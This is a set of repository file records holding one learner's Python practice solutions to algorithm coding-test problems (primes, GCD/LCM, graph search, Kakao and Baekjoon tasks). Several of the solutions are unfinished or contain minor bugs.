"alpha_fraction": 0.5579710006713867, "alphanum_fraction": 0.6521739363670349, "avg_line_length": 16.375, "blob_id": "f77f72e8c5357ccf86b0b9d8bb627c13b9637938", "content_id": "3aa563b35e45fdce35b2ef053b8fafc069dd3fd6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 138, "license_type": "no_license", "max_line_length": 28, "num_lines": 8, "path": "/kakao/큰수만들기x.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(number, k):\n answer = ''\n length=len(number)\n\n return answer\n\nprint(solution('1924',2))\nprint(solution('1231234',3))" }, { "alpha_fraction": 0.4925742447376251, "alphanum_fraction": 0.5037128925323486, "avg_line_length": 18.261905670166016, "blob_id": "316924b0053c3a1ec6cd4d62b77f28d1e7df07a0", "content_id": "00dc66c9ec5dc4c3bec8dd007fa367567173247b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 808, "license_type": "no_license", "max_line_length": 45, "num_lines": 42, "path": "/kakao/소수 찾기.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "li=[]\ndef solution(numbers):\n answer=0\n numbers_list=list(numbers)\n\n visited=[]\n for i in range(len(numbers_list)):\n permut(i,0,len(numbers_list),visited)\n\n n=set()\n for p in li:\n s=''\n for p_ in p:\n s+=numbers_list[p_]\n n.add(int(s))\n print(n)\n for s in n:\n if is_prime(s):\n answer+=1\n return answer\n\ndef permut(curr,depth,D,visited):\n if depth==D:\n return\n else:\n visited.append(curr)\n li.append(visited[:])\n\n for i in range(D):\n if not(i in visited):\n permut(i,depth+1,D,visited)\n visited.pop()\n\ndef is_prime(n):\n if n<=1:\n return False\n for i in range(2,n):\n if n%i==0:\n return False\n return True\n\nprint(solution('99'))" }, { "alpha_fraction": 0.6184210777282715, "alphanum_fraction": 0.6293859481811523, "avg_line_length": 15.925926208496094, "blob_id": 
"828da45b5a64e03d184b81f0d4c8c401601561ab", "content_id": "21b4f7a11af5ed4a1fb07c0947fdcc868f841f35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 456, "license_type": "no_license", "max_line_length": 31, "num_lines": 27, "path": "/백준/연결 요소의 개수_11724.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "N,M= map(int,input().split())\ng={n+1:[] for n in range(N)}\nfor m in range(M):\n\tu,v = map(int,input().split())\n\tg[u].append(v)\n\tg[v].append(u)\n\ndef bfs(graph, start):\n\tvisited =set()\n\n\tqueue=[start]\n\twhile queue:\n\t\tnode = queue.pop()\n\n\t\tif node not in visited:\n\t\t\tvisited.add(node)\n\t\t\tqueue.extend(graph[node])\n\n\treturn visited\n\nvisited=set()\nresult = 0 \nfor n in range(1,N+1):\n\tif n not in visited:\n\t\tresult +=1\n\t\tvisited = visited | bfs(g,n)\nprint(result)" }, { "alpha_fraction": 0.5660130977630615, "alphanum_fraction": 0.5699346661567688, "avg_line_length": 20.27777862548828, "blob_id": "2cb8125ba797deb734c350dd2d7426606e1f8c24", "content_id": "1f4e4badd40565cf6d8c601604e4f3652f266893", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 765, "license_type": "no_license", "max_line_length": 94, "num_lines": 36, "path": "/kakao/조이스틱.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "import sys\ndef solution(name):\n answer = 0\n v_list=[]\n visited=[]\n length=len(name)\n\n for i in range(length):\n answer+=min(ord(name[i])-ord('A'),ord('Z')+1-ord(name[i]))\n if name[i]!='A':\n v_list.append(i)\n\n start=0\n while True:\n if len(v_list)==len(visited):\n break\n d=[cal_distance(start,j,length) if not(j in visited) else sys.maxsize for j in v_list]\n answer+=min(d)\n next=v_list[d.index(min(d))]\n visited.append(next)\n start=next\n\n return answer\n\ndef cal_distance(i,j,length):\n return 
min(abs(j-i),length-j+i)\n\n\nprint(solution('JEROEN'))\nprint(solution('JAN'))\n# print(solution('ABAAAAAAN'))\nprint(solution('AAACAN'))\n\n\n# print(ord('A'))\n# print(ord('Z'))" }, { "alpha_fraction": 0.521276593208313, "alphanum_fraction": 0.5265957713127136, "avg_line_length": 12.285714149475098, "blob_id": "ac03502ad08058c37412bf749e64c008c79a2e96", "content_id": "fa909f76a85b5db977ac1c3bac82ddc5eecada20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 188, "license_type": "no_license", "max_line_length": 31, "num_lines": 14, "path": "/백준/최소공배수_1934.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def gcd(a,b):\n\twhile b!=0:\n\t\tr = a%b\n\t\ta = b\n\t\tb = r\n\treturn a\n\ndef lcm(a,b):\n\treturn a*b//gcd(a,b)\n\nT = int(input())\nfor t in range(T):\n\ta,b = map(int,input().split())\n\tprint(lcm(a,b))\n\n\n" }, { "alpha_fraction": 0.8125, "alphanum_fraction": 0.8125, "avg_line_length": 23, "blob_id": "293fc1c091d446a491c6fe0a057311f216456679", "content_id": "15f327bda4d0f864e4b6977a34aac570158535ae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 48, "license_type": "no_license", "max_line_length": 24, "num_lines": 2, "path": "/README.md", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "# coding_test_practice\npractice for coding test\n" }, { "alpha_fraction": 0.48677247762680054, "alphanum_fraction": 0.49735450744628906, "avg_line_length": 16.18181800842285, "blob_id": "7548ea32e24fdae3b3745620e63a14d317436d94", "content_id": "30a69037aa39e2fc92f84d419f89df0054ea6fdf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 189, "license_type": "no_license", "max_line_length": 33, "num_lines": 11, "path": "/삼성SW/10202.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "T = int(input())\nfor t in 
range(T):\n\tN = int(input())\n\tA = input()\n\tB = input()\n\tC = input()\n\tans = 0\n\tfor a,b,c in zip(A,B,C):\n\t\tans += len(set([a,b,c])\n\n\tprint(\"#{} {}\".format(t+1, ans))\n" }, { "alpha_fraction": 0.518855631351471, "alphanum_fraction": 0.5552665591239929, "avg_line_length": 24.633333206176758, "blob_id": "cfb545563d4e7daed467786d9d6f11729011d941", "content_id": "be06cc1afe3fb6fa5114518caa2e23ea113db63d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 769, "license_type": "no_license", "max_line_length": 184, "num_lines": 30, "path": "/kakao/후보키_완성x.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "combination=[]\n\ndef solution(relation):\n answer = 0\n row = len(relation) #data num\n col=len(relation[0]) #attribute\n keys=[]\n result=[]\n for i in range(col):\n dfs(i, col, result)\n\n # comb= sorted(combination, key=len)\n print(combination)\n return answer\n\ndef dfs(curr, size, result):\n if curr==size:\n return\n else:\n result.append(curr)\n combination.append(result[:])\n\n for i in list(range(curr+1,size+1)):\n dfs(i,size,result)\n result.pop()\n\n\nif __name__ == '__main__':\n relation=[[\"100\",\"ryan\",\"music\",\"2\"],[\"200\",\"apeach\",\"math\",\"2\"],[\"300\",\"tube\",\"computer\",\"3\"],[\"400\",\"con\",\"computer\",\"4\"],[\"500\",\"muzi\",\"music\",\"3\"],[\"600\",\"apeach\",\"music\",\"2\"]]\n answer=solution(relation)\n" }, { "alpha_fraction": 0.5186335444450378, "alphanum_fraction": 0.590062141418457, "avg_line_length": 22.071428298950195, "blob_id": "fb1d792b15074ed60a36164384a0bc80aa360d8e", "content_id": "09bb374781aa6551b5972e91259d71128f780ca0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 322, "license_type": "no_license", "max_line_length": 52, "num_lines": 14, "path": "/kakao/H-index.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def 
solution(citations):\n answer = 0\n for i in range(len(citations)+1):\n num=sum(1 if x>=i else 0 for x in citations)\n if num<i:\n return answer\n answer=i\n\n return answer\n\nprint(solution([3,0,6,1,5]))\nprint(solution([10,100]))\nprint(solution([6,6,6,6,6,6]))\nprint(solution([2,2,2]))" }, { "alpha_fraction": 0.31081080436706543, "alphanum_fraction": 0.4285714328289032, "avg_line_length": 17.5, "blob_id": "def35c5f1514db2724952bbc3c963ccff7644b64", "content_id": "e7c482b3b5e270e2e090b3b24da572571f5cdde9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 518, "license_type": "no_license", "max_line_length": 35, "num_lines": 28, "path": "/kakao/비밀지도.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(n,arr1,arr2):\n answer=[]\n for i in range(len(arr1)):\n bw=bin(arr1[i]|arr2[i])[2:]\n a=''\n for s in bw:\n if s=='0':\n a+=' '\n else:\n a+='#'\n answer.append(a)\n\n return answer\n\n\n\nif __name__ == \"__main__\":\n #1\n n=5\n arr1=[9,20,28,18,11]\n arr2=[30,1,21,17,28]\n print(solution(n,arr1,arr2))\n\n #2\n n=6\n arr1=[46, 33, 33 ,22, 31, 50]\n arr2=[27 ,56, 19, 14, 14, 10]\n print(solution(n,arr1,arr2))\n" }, { "alpha_fraction": 0.5539568066596985, "alphanum_fraction": 0.5827338099479675, "avg_line_length": 18.928571701049805, "blob_id": "58643b39acf1d8ff7d41417a326387fc3b877081", "content_id": "9d9356bc70c8bae6b2caf2cc38de21a7be72d39b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 278, "license_type": "no_license", "max_line_length": 36, "num_lines": 14, "path": "/백준/N과 M7_15656.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "N,M = map(int,input().split())\nseq = list(map(int,input().split()))\nseq.sort()\n\ndef re(num, count, visited):\n\tif count == M:\n\t\tprint(' '.join(map(str,visited)))\n\t\treturn\n\t\n\tfor i in range(1,N+1):\n\t\tre(i, count+1, 
visited+[seq[i-1]])\n\nfor i in range(1,N+1):\n\tre(i, 1, [seq[i-1]])" }, { "alpha_fraction": 0.5240963697433472, "alphanum_fraction": 0.5301204919815063, "avg_line_length": 10.928571701049805, "blob_id": "cae9eee71e18e5e5f7ecb60e84539eb04895e12d", "content_id": "4eeb91a8d410971c9aa791377e4436d4a17d1a98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 166, "license_type": "no_license", "max_line_length": 30, "num_lines": 14, "path": "/백준/최대공약수와 최소공배수_2609.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "a,b = map(int,input().split())\n\ndef gcd(a,b):\n\twhile b!=0:\n\t\tr = a%b\n\t\ta = b\n\t\tb = r\n\treturn a\n\ndef lcm(a,b):\n\treturn a*b // gcd(a,b)\n\nprint(gcd(a,b))\nprint(lcm(a,b))" }, { "alpha_fraction": 0.3484201431274414, "alphanum_fraction": 0.36891546845436096, "avg_line_length": 21.960784912109375, "blob_id": "3bf38af161317a7a4d743c26d007b71e6dafcd01", "content_id": "b52a1ec95d310cbedfdc99a8e430f8290dfb114f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1171, "license_type": "no_license", "max_line_length": 43, "num_lines": 51, "path": "/kakao/프렌즈4블록.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "\ndef solution(m,n,board):\n answer=0\n b=[]\n for s in board:\n s=list(s)\n b.append(s)\n\n collision=find(m,n,b)\n while len(collision)!=0:\n collision = find(m, n, b)\n for cor in collision:\n idx=cor[0]\n idy=cor[1]\n b[idx][idy]='-'\n answer+=1\n for i in range(m-1):\n for j in range(n-1):\n try:\n if b[i][j]=='-':\n b[i][j]=b[i-1][j]\n b[i-1][j]='-'\n except:\n pass\n return answer\n\ndef find(m,n,board):\n l=set()\n for i in range(m-1):\n for j in range(n-1):\n a=board[i][j]\n b=board[i][j+1]\n c=board[i+1][j]\n d=board[i+1][j+1]\n if a==b==c==d!='-':\n l.add((i,j))\n l.add((i+1,j))\n l.add((i,j+1))\n l.add((i+1,j+1))\n\n return l\ndef move(i,j):\n if 
board[i][j+1]!='-':\n return\n b[i][j+1]==b[i][j]\n move(i,j+1)\n\nif __name__==\"__main__\":\n m=4\n n=5\n board=['CCBDE','AAADE','AAABF','CCBBF']\n print(solution(m,n,board))" }, { "alpha_fraction": 0.46732836961746216, "alphanum_fraction": 0.4921422600746155, "avg_line_length": 24.14583396911621, "blob_id": "3d7140139ffdb798c939f005659d4043e75309fc", "content_id": "c9c0f321eed1dccb224b5cb24c4a0103fc4c472a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1259, "license_type": "no_license", "max_line_length": 118, "num_lines": 48, "path": "/kakao/채팅방.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "from sys import stdin\ninput=stdin.readline\n\ndef preprocessing(record):\n li=[]\n l=''\n for s in record:\n if s.isalnum():\n l+=s\n else:\n if l.isalnum():\n li.append(l)\n l=''\n return li\n\n\ndef solution(record):\n answer = []\n events=[]\n dict={}\n for i,s in enumerate(record):\n if s=='Enter':\n id=record[i+1]\n name=record[i+2]\n dict[id]=name\n events.append([s,id])\n elif s=='Leave':\n id = record[i + 1]\n name = record[i + 2]\n events.append([s,id])\n elif s=='Change':\n id = record[i + 1]\n name = record[i + 2]\n dict[id]=name\n\n for event in events:\n if event[0]=='Enter':\n answer.append('{}님이 들어왔습니다.'.format(dict[event[1]]))\n elif event[0] =='Leave':\n answer.append('{}님이 나갔습니다.'.format(dict[event[1]]))\n\n return answer\n\nif __name__ == '__main__':\n # record = input()\n record='[“Enter uid1234 Muzi”, “Enter uid4567 Prodo”,”Leave uid1234”,”Enter uid1234 Prodo”,”Change uid4567 Ryan”]'\n record = preprocessing(record)\n answer=solution(record)\n\n\n" }, { "alpha_fraction": 0.612500011920929, "alphanum_fraction": 0.6333333253860474, "avg_line_length": 14.0625, "blob_id": "65394bf169bf599cb2f543fb8b636180fea69c07", "content_id": "c360fcd85bec0dd1d47fcc760919d4497171ac49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 240, "license_type": "no_license", "max_line_length": 37, "num_lines": 16, "path": "/백준/소수 찾기_1978.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def is_PrimeNumber(n):\n\tif n==1:\n\t\treturn False\n\t\n\tfor i in range(2,n):\n\t\tif n%i ==0:\n\t\t\treturn False\n\treturn True\n\nN=int(input())\nnums = list(map(int,input().split()))\ncount = 0\nfor n in nums:\n\tif is_PrimeNumber(n):\n\t\tcount+=1\nprint(count)" }, { "alpha_fraction": 0.42114385962486267, "alphanum_fraction": 0.45753899216651917, "avg_line_length": 21.230770111083984, "blob_id": "01ba275d85f2fd3b41332ba92139bbf9d9d89faa", "content_id": "4c3854b17f47d68787ab0f1e52bbe126597aaa24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 577, "license_type": "no_license", "max_line_length": 53, "num_lines": 26, "path": "/백준/골드바흐의 추측_6588.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "MAX=1000000\nprime=[False for _ in range(MAX+1)]\n\nfor i in range(2, MAX+1):\n if i*i > MAX:\n break\n if prime[i] is False:\n for j in range(i*i, MAX+1, i):\n prime[j] = True\n\nwhile True:\n n= int(input())\n if n ==0:\n break\n \n check=True\n for p1 in range(2,MAX+1):\n if prime[p1] is False:\n p2= n-p1\n \n if prime[p2] is False:\n print(\"{} = {} + {}\".format(n,p1,p2))\n check=False\n break\n if check:\n print(\"Goldbach's conjecture is wrong.\")" }, { "alpha_fraction": 0.5959821343421936, "alphanum_fraction": 0.6071428656578064, "avg_line_length": 14.482758522033691, "blob_id": "f109b96c7cc814ae123da405080d1dd0d306e5a6", "content_id": "0065ef3dd2e87b6e606d06473729d8929ede8b96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 448, "license_type": "no_license", "max_line_length": 49, "num_lines": 29, "path": "/백준/ABCDE_13023.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "N, M = map(int, 
input().split())\nd={i:[] for i in range(N)}\n\nstate = False\ndef dfs(node, count, visited):\n\tglobal state\n\tif state:\n\t\treturn\n\n\tif count == 5:\n\t\tstate = True\n\t\treturn\n\t\n\tfor next_node in d[node]:\n\t\tif next_node not in visited:\n\t\t\tdfs(next_node, count+1, visited + [next_node])\n\nfor i in range(M):\n\ta,b = map(int, input().split())\n\td[a].append(b)\n\td[b].append(a)\n\nfor i in range(M):\n\tdfs(i, 1, [i])\n\nif state:\n\tprint(1)\nelse:\n\tprint(0)" }, { "alpha_fraction": 0.475862056016922, "alphanum_fraction": 0.5034482479095459, "avg_line_length": 16.058822631835938, "blob_id": "573a84edfbea0d65c2bc6561211beacf2b6fdce1", "content_id": "0d3854bcbd8bde78b1a4d6f3bc66f9265b39e90d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 290, "license_type": "no_license", "max_line_length": 42, "num_lines": 17, "path": "/삼성SW/10204.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "T = int(input())\nfor t in range(T):\n\tN = int(input())\n\ti = []\n\tans = 0\n\n\tfor n in range(N):\n\t\ti.append(list(map(int,input().split())))\n\ti.sort(key=lambda x:(x[0]+x[1]))\n\t\n\tfor n in range(N):\n\t\tif n%2 == 0:\n\t\t\tans += i.pop()[0]\n\t\telse:\n\t\t\tans -= i.pop()[1]\n\n\tprint(\"#{} {}\".format(t+1,ans))\n" }, { "alpha_fraction": 0.45077720284461975, "alphanum_fraction": 0.4663212299346924, "avg_line_length": 18.299999237060547, "blob_id": "490343ef3cad3a4da3edbb9dc091e73e541585ac", "content_id": "49e5af732400f2cb218893fee1fca6453f55055e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 193, "license_type": "no_license", "max_line_length": 27, "num_lines": 10, "path": "/programas/예산.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "def solution(d, budget):\n answer = 0\n d.sort(key=lambda x:-x)\n while d:\n budget -= d.pop()\n if budget <0:\n break\n answer +=1\n \n 
return answer\n" }, { "alpha_fraction": 0.633156955242157, "alphanum_fraction": 0.6366842985153198, "avg_line_length": 17.322580337524414, "blob_id": "abdb5fba3f1cf91fc08ca6124e69ba69e3c45639", "content_id": "5aa2b747481e60c2197cca82c10dd326668aa728", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 567, "license_type": "no_license", "max_line_length": 42, "num_lines": 31, "path": "/백준/DFS와 BFS_12660.py", "repo_name": "Onedas/coding_test_practice", "src_encoding": "UTF-8", "text": "N,M,V=map(int,input().split())\ng={n+1:[] for n in range(N)}\nfor m in range(M):\n\ta,b = map(int,input().split())\n\tg[a].append(b)\n\tg[b].append(a)\n\ndef bfs(graph, start):\n\tvisited = []\n\tqueue = [start]\n\twhile queue:\n\t\tnode = queue.pop()\n\t\tif node not in visited:\n\t\t\tvisited.append(node)\n\t\t\tqueue.extend(reversed(sorted(g[node])))\n\n\treturn visited\n\ndef dfs(graph, start):\n\tvisited =[]\n\tstack = [start]\n\twhile stack:\n\t\tnode = stack.pop(0)\n\t\tif node not in visited:\n\t\t\tvisited.append(node)\n\t\t\tstack.extend(sorted(g[node]))\n\n\treturn visited\n\nprint(*bfs(g,V))\nprint(*dfs(g,V))" } ]
41
xkfisher/thinkful
https://github.com/xkfisher/thinkful
83f3891a6a3823c9376b2642e32d214801946f3a
160cdde6d533672117d5b2f4775885351634cc33
576f07580af118e4476880f46a832399b377ab6c
refs/heads/master
2021-01-15T10:18:07.904085
2015-06-23T00:22:21
2015-06-23T00:22:21
37,886,951
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5433714985847473, "alphanum_fraction": 0.5646480917930603, "avg_line_length": 21.66666603088379, "blob_id": "4c3d67d3f5cb3a26b340e9c7e5a90440b724e2b5", "content_id": "8befb3156b59a4dd6efb780cac2f90c57cf4a1cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 611, "license_type": "no_license", "max_line_length": 68, "num_lines": 27, "path": "/fizz_buzz/fizzbuzz2.py", "repo_name": "xkfisher/thinkful", "src_encoding": "UTF-8", "text": "import sys\n\n\nprint \"The name of this script is {}\".format(sys.argv[0])\nprint \"User supplied {} arguments at run time\".format(len(sys.argv))\n\ntry:\n n=int(sys.argv[1])\nexcept:\n n=\"not int\"\n\nwhile type(n)!=int:\n try:\n n=int(raw_input(\"enter the upper limit of the count\"))\n except:\n print(\"you have entered non numeric value, try again\")\n \nprint(\"Fizz buzz counting up to {0}\".format(n))\nfor i in range (1,n+1):\n if ((i%3==0) and (i%5==0)):\n print(\"fizzbuzz\")\n elif (i%3==0):\n print (\"fizz\")\n elif (i%5==0):\n print (\"buzz\")\n else:\n print (i)" }, { "alpha_fraction": 0.4204081594944, "alphanum_fraction": 0.4734693765640259, "avg_line_length": 21.363636016845703, "blob_id": "81f8ddedbbe697317983c3117c80b82511d5e7a9", "content_id": "e0d2e6e994e62dbd9af47d01cbaa8dec136a2e91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 245, "license_type": "no_license", "max_line_length": 47, "num_lines": 11, "path": "/fizz_buzz/fizzbuzz.py", "repo_name": "xkfisher/thinkful", "src_encoding": "UTF-8", "text": "n=100\nprint(\"Fizz buzz counting up to {0}\".format(n))\nfor i in range (1,n):\n if ((i%3==0) and (i%5==0)):\n print(\"fizzbuzz\")\n elif (i%3==0):\n print (\"fizz\")\n elif (i%5==0):\n print (\"buzz\")\n else:\n print (i)" } ]
2
shenbanakshetha24/exp10
https://github.com/shenbanakshetha24/exp10
bdbb4692ede0ffdd75da56eb7013b820e1d0653c
498579d6c23d893ec74918fa59a9a01ca291f442
8fa279d7e9d9d2430ea0a4e748db399044264472
refs/heads/master
2020-06-11T09:51:31.023737
2019-06-26T14:43:46
2019-06-26T14:43:46
193,922,997
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5072463750839233, "alphanum_fraction": 0.5797101259231567, "avg_line_length": 10.5, "blob_id": "f514ad97a19a3408b64d615c80514619edc04aa6", "content_id": "b79b1ef9ddbca13e998498175bf1dd3ebbfb5432", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 69, "license_type": "no_license", "max_line_length": 16, "num_lines": 6, "path": "/count.py", "repo_name": "shenbanakshetha24/exp10", "src_encoding": "UTF-8", "text": "num=int(input())\nc=0\nwhile(num>0):\n num=num//10\n c=c+1\nprint(\"%d\"%c)\n" } ]
1
mjschaub/portfolio-site
https://github.com/mjschaub/portfolio-site
8e5b196855bec9926569d1043ab5226b44afd0dc
5248f23e6380d90e050dcfc2388914281df98dd0
2f2c4e4c0a50e984b5863f27784b5ece459b4132
refs/heads/master
2021-01-20T07:07:08.763361
2017-05-01T20:28:15
2017-05-01T20:28:15
89,959,840
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4699481725692749, "alphanum_fraction": 0.49119171500205994, "avg_line_length": 30.129032135009766, "blob_id": "d7f798360f56388bec2eeb5acb27fc26fb01927c", "content_id": "02af8af102d6c20937695a065b19a9502ce58893", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1930, "license_type": "no_license", "max_line_length": 105, "num_lines": 62, "path": "/web/templates/revision_view.html", "repo_name": "mjschaub/portfolio-site", "src_encoding": "UTF-8", "text": "<!-- template from bootstrap: http://getbootstrap.com/2.3.2/examples/hero.html# -->\n<!DOCTYPE html>\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\">\n <title>Portfolio</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <meta name=\"description\" content=\"\">\n <meta name=\"author\" content=\"\">\n <link href=\"http://getbootstrap.com/2.3.2/assets/css/bootstrap.css\" rel=\"stylesheet\">\n <link href=\"http://getbootstrap.com/2.3.2/assets/css/bootstrap-responsive.css\" rel=\"stylesheet\">\n <style type=\"text/css\">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n </style>\n </head>\n <body>\n <div class=\"navbar navbar-inverse navbar-fixed-top\">\n <div class=\"navbar-inner\">\n <div class=\"container\">\n <a class=\"brand\" href=\"/\">My Portfolio</a>\n </div>\n </div>\n </div>\n <div class=\"container\">\n\t <div class=\"hero-unit\">\n\t <div class=\"row\">\n\t {% for file in files %}\n <div class=\"span4\">\n\t {% if file['kind'] == \"dir\" %}\n\t\t{% if file['path']|length >= 32 %}\n\t <h4>{{file['path'][0:32]+'...'}}</h4>\n\t\t{% else %}\n\t\t<h4>{{file['path']}}</h4>\n\t {% endif %}\n\t\t{% endif %}\n\t {% if file['kind'] != \"dir\" %}\n\t\t{% if file['path']|length >= 43 %}\n \t<h6>File: {{file['path'][0:43]}}</h6>\n\t\t<h6>{{file['path'][43:]}}</h6>\n\t\t{% else %}\n\t\t<h6>File: {{file['path']}}</h6>\n\t\t{% endif %}\n\t <p>size: {{file['size']}}</p>\n\t {% endif %}\n <p>Type 
of file: {{file['kind']}}</p>\n\t <p>Action: {{file['action']}}</p>\n\t {% if (file['kind'] != \"dir\" and file['action'] != \"D\") %}\n <p><a class=\"btn\" href=\"/projects/{{revision_num}}/{{file['file_id']}}\">View File</a></p>\n\t\t{% else %}\n\t\t<hr width=\"66%\">\n\t {% endif %}\n\t </div>\n {% endfor %}\n\t </div>\n\t </div>\n <hr>\n </div>\n </body>\n</html>\n" }, { "alpha_fraction": 0.5644082427024841, "alphanum_fraction": 0.5713870525360107, "avg_line_length": 29.756755828857422, "blob_id": "4909e7d05f787544c359cfbe5e137bd566aa14c8", "content_id": "587618733f129ec7606aafb3166273dec3614d40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3439, "license_type": "no_license", "max_line_length": 143, "num_lines": 111, "path": "/parser/xml_parser.py", "repo_name": "mjschaub/portfolio-site", "src_encoding": "UTF-8", "text": "'''\nCreated on Mar 6, 2017\n\n@author: mjschaub\n'''\nimport xml.etree.ElementTree as ET\nimport projects.log_entry as le\nimport projects.Project as proj\nimport json\nfrom pymongo import MongoClient\nclient = MongoClient()\n\n\n'''\nParse's the log to retrieve each commit and all the required data from it.\n@param file: the log file to input\n@return: the array of log entries\n'''\ndef parse_log(file):\n e = ET.parse(file).getroot()\n log_entries = []\n #print(e.items())\n for logentry in e.iter('logentry'):\n curr_entry = []\n curr_entry.append(logentry.attrib)\n print(logentry.attrib)\n for auth in logentry.iter('author'):\n print(auth.text)\n curr_entry.append(auth.text)\n for date in logentry.iter('date'):\n print(date.text)\n curr_entry.append(date.text)\n paths = []\n for path in logentry.iter('path'):\n print(path.text)\n paths.append(path.text)\n curr_entry.append(paths)\n path_attribs =[]\n for path in logentry.iter('path'):\n print(path.attrib)\n path_attribs.append(path.attrib)\n curr_entry.append(path_attribs)\n for msg in logentry.iter('msg'):\n print(msg.text)\n 
curr_entry.append(msg.text)\n log_entries.append(curr_entry)\n return log_entries\n'''\nparse's the list xml file but for my implementation I only fetched the size of each file from the list as the log had all the other information\n@param file: the list file\n@param path_name: the path of the file to get the size of\n@return: the size of the file\n''' \ndef parse_list(file, path_name):\n \n e = ET.parse(file).getroot()\n ret_size = 0\n for entry in e.iter('entry'):\n name = ''\n for i in entry.iter('name'):\n name = i.text\n if name == path_name:\n for i in entry.iter('size'):\n ret_size = i.text\n\n return ret_size\n\n\nif __name__ == '__main__':\n \n list_file = 'svn_list.xml'\n log_file = 'svn_log.xml'\n \n entries = parse_log(log_file)\n \n db = client['portfolio']\n files = db['files']\n logs = db['logs']\n entry_objs = []\n curr_id = 0\n print(db['files'].count())\n print(db['logs'].count())\n db['files'].remove({})\n db['logs'].remove({})\n print(db['files'].count())\n for i in range(len(entries)):\n x = entries[i]\n kinds = [my_dict['kind'] for my_dict in x[4]]\n actions = [my_dict['action'] for my_dict in x[4]]\n projects = []\n for i in range(len(x[3])):\n curr_path = x[3][i]\n size_to_add = 0\n if kinds[i] == 'file':\n size_to_add = parse_list(list_file,curr_path.replace('/mjschau2/',''))\n svn_link = str('https://subversion.ews.illinois.edu/svn/sp17-cs242'+curr_path+'/?p='+x[0]['revision'])\n temp_proj = proj.Project(curr_path,size_to_add,actions[i],kinds[i], text=svn_link,file_id=curr_id)\n result = files.insert_one(temp_proj.__dict__)\n #print(result)\n curr_id+=1\n projects.append(temp_proj.__dict__)\n temp_obj = le.log_entry(int(x[0]['revision']),x[1],x[2],x[5],projects)\n entry_objs.append(temp_obj.__dict__)\n \n project_data = entry_objs\n \n \n #now put up on mongodb database\n \n result = logs.insert_many(project_data)\n print(result.inserted_ids)\n \n \n \n \n \n" }, { "alpha_fraction": 0.601214587688446, "alphanum_fraction": 
